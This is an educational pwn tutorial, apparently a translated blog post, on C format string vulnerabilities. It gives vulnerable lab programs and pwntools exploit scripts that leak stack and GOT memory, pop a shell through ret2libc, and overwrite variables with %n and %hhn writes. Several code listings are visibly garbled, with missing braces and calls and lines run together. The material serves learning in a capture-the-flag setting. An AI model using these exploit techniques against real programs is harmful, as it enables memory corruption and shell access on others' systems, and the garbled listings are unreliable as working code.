[pwn learning] format character vulnerability

What is a format character vulnerability

The format string function can accept a variable number of parameters, take the first parameter as the format string, and parse the parameters according to it. Generally speaking, the format string function is to convert the data represented in computer memory into a human readable string format. Almost all C/C + + programs use formatted string functions to output information, debug programs, or process strings. Generally speaking, the format string is mainly divided into three parts.

Format Into String

  • Input: scanf

  • Output:

format string

Basic format

%[parameter][flags][field width][.precision][length]type

Need attention in pwn

  • parameter
    • n $, get the specified parameter in the format string
  • length
    • hh, output a byte
    • h. Output a double byte
  • type
    • d/i, signed integer
    • u. Unsigned integer
    • x/X, hexadecimal unsigned integer
    • o. Octal unsigned integer
    • n. No characters are output, but the number of characters that have been successfully output is written to the variable indicated by the corresponding integer pointer parameter.

So what's the use of the above? Take the following example program as an example

// test.c
// gcc test.c -m32 -o test
#include <stdio.h>

int main(int argc, char *argv[])
        printf("Color %s, Number %d, Float %4.2f");
        return 0;

In printf, what happens when there are no parameters provided

root@kali:~/ctf/Other/pwn/fmtstrTest# ./test
Color !{��, Number -5021172, Float -13609363015660276767861975804845741867148812000057244728627349647521205925006820418315482418654746428935787248312989741686623617507326100836271030992971258520059038764468552397903024091741864220914512543638279560963003911187719312179301466854378314065568140994293458123131936020891717710705342044204066406400.00

The program will run as before, and the three variables above the formatted string address stored on the stack will be parsed in turn.


Leak memory

  • %X$p: leak the value of the x position on the stack

    • X is any positive integer
  • addr%X$p: disclose data at any address

    • Assuming that the format string function call is the X-th parameter on the stack,

    • addr is the address to be disclosed

      Take the following procedure as an example

      // test2.c
      #include <stdio.h>
      #include <unistd.h>
      void foo(void)
      int main(int argc, char *argv[])
              char buf[100];
              read(0, buf, 100);
              return 0;

      There is a string bbbb in this program. We first use static analysis to obtain the storage address of this string (0x0804a008 in my experimental environment), and then disclose the string content of this string

      from pwn import *
      conn = process('./test2')
      # 0x0804a008 will be at the 7th position on the stack after input
      payload = p32(0x0804a008) + b'%7$s'

      After getting the output after running, you can find that the string at the address 0x0804a008 is output

      [+] Starting local process './test2': pid 92179

Example: using format string vulnerability to obtain libc base address

Take the following procedure as an example

// test3.c
// gcc test3.c -m32 -no-pie -fno-stack-protector -o test3

#include <stdio.h>
#include <unistd.h>

void vul(void){
      char buf[40];
      char buf2[20];
      read(0, buf, 40);
      read(0, buf2, 100);

int main(int argc, char *argv[])
      return 0;

1. View security policy
[*] '/root/ctf/Other/pwn/fmtstrTest/test3'
  Arch:     i386-32-little
  RELRO:    Partial RELRO
  Stack:    No canary found
  NX:       NX enabled
  PIE:      No PIE (0x8048000)
2. static analysis

Through static analysis, no dangerous function is found and no string can be used

During disassembly, it is found that the second read in the vul function has a stack overflow problem, and printf has a format string vulnerability

...|           0x080491a9      6a28           push 0x28                   ; '(' ; 40|           0x080491ab      8d45d0         lea eax, dword [var_30h]|           0x080491ae      50             push eax|           0x080491af      6a00           push 0|           0x080491b1      e87afeffff     call sym.imp.read|           0x080491b6      83c410         add esp, 0x10|           0x080491b9      83ec0c         sub esp, 0xc|           0x080491bc      8d45d0         lea eax, dword [var_30h]|           0x080491bf      50             push eax|           0x080491c0      e87bfeffff     call sym.imp.printf|           0x080491c5      83c410         add esp, 0x10|           0x080491c8      83ec04         sub esp, 4|           0x080491cb      6a64           push 0x64                   ; 'd' ; 100|           0x080491cd      8d45bc         lea eax, dword [var_44h]|           0x080491d0      50             push eax|           0x080491d1      6a00           push 0|           0x080491d3      e858feffff     call sym.imp.read...
3. payload

According to the static analysis, a formatted string is used to disclose the libc base address + overflow to obtain the shell.

First, confirm the position of the format string in the stack,

root@kali:~/ctf/Other/pwn/fmtstrTest# ./test3helloaaaa%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-aaaa0xffbdf378-0x28-0x804918e-(nil)-(nil)-0x8048034-0xf7ef1a28-0xf7ef0000-0xf7f21230-0x61616161-0x252d7025-0x70252d70-0��ro

aaaa is at the 10th position in the stack

Then, the format string vulnerability is used to disclose the actual location of the function, so as to obtain libc. Here, take the leaked read address as an example

payload_1 = p32(read_got) + b'%10$s'

Then you can get the actual address of read from the content of the response

read_addr = u32(conn.recv()[4:8])  # [0:4] Yes read_ The address of got, [4:8] is read_got stored value

The printed length may be different because it is printed in the format of% s, that is, string, so it will be printed until the string is truncated, such as truncated characters such as \ x0a.

Then use LibcSearcher to get libc, and then get system and / bin/sh

4. Write up
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
conn = process('./test3')

elf = conn.elf
func_name = 'read'
leak_got = elf.got[func_name]

# leak libc base
payload = p32(leak_got) + b'%10$s'
recvstr = conn.recv()
leak_addr = u32(recvstr[4:8])
print(f'Get leak address: {hex(leak_addr)}')

libc = LibcSearcher(func_name, leak_addr)
libc_base = leak_addr - libc.dump(func_name)

# getshell
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = b'a' * (0x44 + 0x4)
payload += p32(system) + p32(0) + p32(binsh)

Overwrite memory

The above demonstrates the use of format string vulnerabilities to disclose stack addresses and arbitrary memory addresses. Let's learn how to overwrite memory.

The main use is

%n,No characters are output, but the number of characters that have been successfully output is written to the variable indicated by the corresponding integer pointer parameter.
  • %Yc%X$n: write Y to the position pointed to by the X position pointer on the stack
    • Y: Y is the data to be written
    • 10: X is any positive integer
    • Further write to any address, addr%(Y-4)c%X$n

Stack address overlay

Take the following procedure as an example

// test4.c// gcc test4.c -m32 -no-pie -fno-stack-protector -o test4#include <stdio.h>int a = 123, b = 456;int main() {  int c = 789;  char s[100];  printf("%p\n", &c);  scanf("%s", s);  printf(s);  if (c == 16) {    puts("modified c.");  } else if (a == 2) {    puts("modified a for a small number.");  } else if (b == 0x12345678) {    puts("modified b for a big number!");  }  return 0;}

First, confirm the position of the format string on the stack, as shown below, at the 6th position on the stack

root@kali:~/ctf/Other/pwn/fmtstrTest# ./test40xffc3a29caaaa%p-%p-%p-%p-%p-%p-%p-%p-%p aaaa0xffc3a238-0xf7f69410-0x8049199-(nil)-0x1-0x61616161-0x252d7025-0x70252d70-0x2d70252d
  • Try printing the modified c branch,

You need to rewrite the value of c from 789 to 16. The program returns the address of c, writes the address of c to the stack by writing to any address, and then assigns a value to the address.

from pwn import *
context.log_level = 'debug';
conn = process('./test4')
c_addr = int(conn.recvuntil(b'\n').split(b'\n')[0], 16)
# c_addr takes up 4 bytes, so an additional 12 bytes are added to C_ The space pointed to by addr is assigned 16
payload = p32(c_addr) + b'%12c' + b'%6$n'

Decimal coverage

Use radar to obtain the addresses of a and b

[0x08049070]> iE
Num Paddr      Vaddr      Bind     Type Size Name
048 0x00003028 0x0804c028 GLOBAL    OBJ    4 b
062 0x00003024 0x0804c024 GLOBAL    OBJ    4 a

Let's try to go to the branch of a==2.

If the previous method is also used, the address written must occupy at least 4 bits, so the minimum can only be assigned 4.

Here we try to put the address in the back position.

Assign 2, to write aa%X$n, assign 2 to the position pointed to by the X-th position pointer. The length of this string is 6, not a multiple of 4. All of them have to complete two characters, plus the address of A. In this way, a finally falls in the 8th position on the stack.

The final constructed paylaod should be aa%8$nbb\x20\xc0\x04\x08

Construct write up

from pwn import *
context.log_level = 'debug';
conn = process('./test4')
c_addr = int(conn.recvuntil(b'\n').split(b'\n')[0], 16)

payload = b'aa%8$nbb' + p32(0x0804c024)


Large number coverage

If you try to go to the branch b == 0x12345678, you need to assign a large number. At this time, it must be inconvenient to write so much data directly to the stack. Write byte by byte using hh and h parameters

hh Single byte
h  Double byte

We write in single byte mode. The address of b is 0x0804c028. The data allocation after byte by byte writing should be as follows

0x0804c028 	\x78
0x0804c029	\x56
0x0804c02a	\x34
0x0804c02b	\x12

Therefore, with the construction of payload, the string length increases gradually. Therefore, the bytes should be filled in the order from small to large. Here, the bytes should be filled from high to high

payload = p32(0x0804c02b) + b'a'*(0x12 - 4) + b'%6$hhn'	# Current total length = 24, character length 0x12

Fill the next high bit below. Pay attention when filling the back, because this is a sent payload, so when filling the back, the length of the front string should also be counted.

The length of the previous string has been 24 bytes, so the address of the second highest bit will be written to bytes 25-28, which corresponds to the 12th position in the stack (24 / 4 + 6).

When constructing the string of the second highest bit, be careful not to include the length of% 6$hhn. Therefore, the number of strings to be filled next is the total number of bytes required for the second highest byte - the number of bytes already constructed in the previous byte - the address bits of the second highest byte.

Therefore, there is a payload to fill in the next high address, so the address should be aligned. Therefore, three b's are added here, so that the total length is a multiple of 4.

payload += p32(0x0804c02a) + b'a'*(0x34 - 0x12 - 4) + b'%12$hhn' + b'bbb' # Current total length = 68

Next, fill the lower order. The construction method is similar to the above, but remember to subtract the length of the three aligned bytes of bbb when adding characters.

payload += p32(0x0804c029) + b'a'*(0x56 - 0x34 - 4 - 3) + b'%23$hhn' + b'bb' # Current total length = 108

Last fill low

payload += p32(0x0804c028) + b'a'*(0x78- 0x56 - 4 - 2) + b'%33$hhn'

Construct write up

from pwn import *
context.log_level = 'debug';
conn = process('./test4')

payload = p32(0x0804c02b) + b'a'*(0x12 - 4) + b'%6$hhn'
payload += p32(0x0804c02a) + b'a'*(0x34 - 0x12 - 4) + b'%12$hhn' + b'bbb' 
payload += p32(0x0804c029) + b'a'*(0x56 - 0x34 - 4 - 3) + b'%23$hhn' + b'bb'
payload += p32(0x0804c028) +  b'a'*(0x78- 0x56 -4 -2) + b'%33$hhn'



When covering any address, you need to calculate a lot of filling length, stack position, etc., which is still very troublesome. However, some big guys have already built wheels, which are the ones in pwntools FmtStr class.

fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

  • Offset (int): offset of string

  • writes (dict): injected address and value, {target_addr: change_to,}

  • Numbwriten (int): the number of bytes written by the printf function. The default is 0

  • write_size: write byte by byte/short/int. the default is byte

from pwn import *
context.log_level = 'debug';
conn = process('./test4')

# a
# payload = fmtstr_payload(6, {0x0804c024:0x2})

# b
payload = fmtstr_payload(6, {0x0804c028:0x12345678})


You can also learn a shorter way to construct the payload by changing the tool

payload = '%18c%17$hhn' + b'%34c%18$hhn' + b'%34c%19$hhn' + b'%34c%20$hhn' + p32(0x0804c02b) + p32(0x0804c02a) + p32(0x0804c029) + p32(0x0804c028)

Keywords: security Web Security pwn

Added by jiayanhuang on Wed, 29 Dec 2021 18:52:22 +0200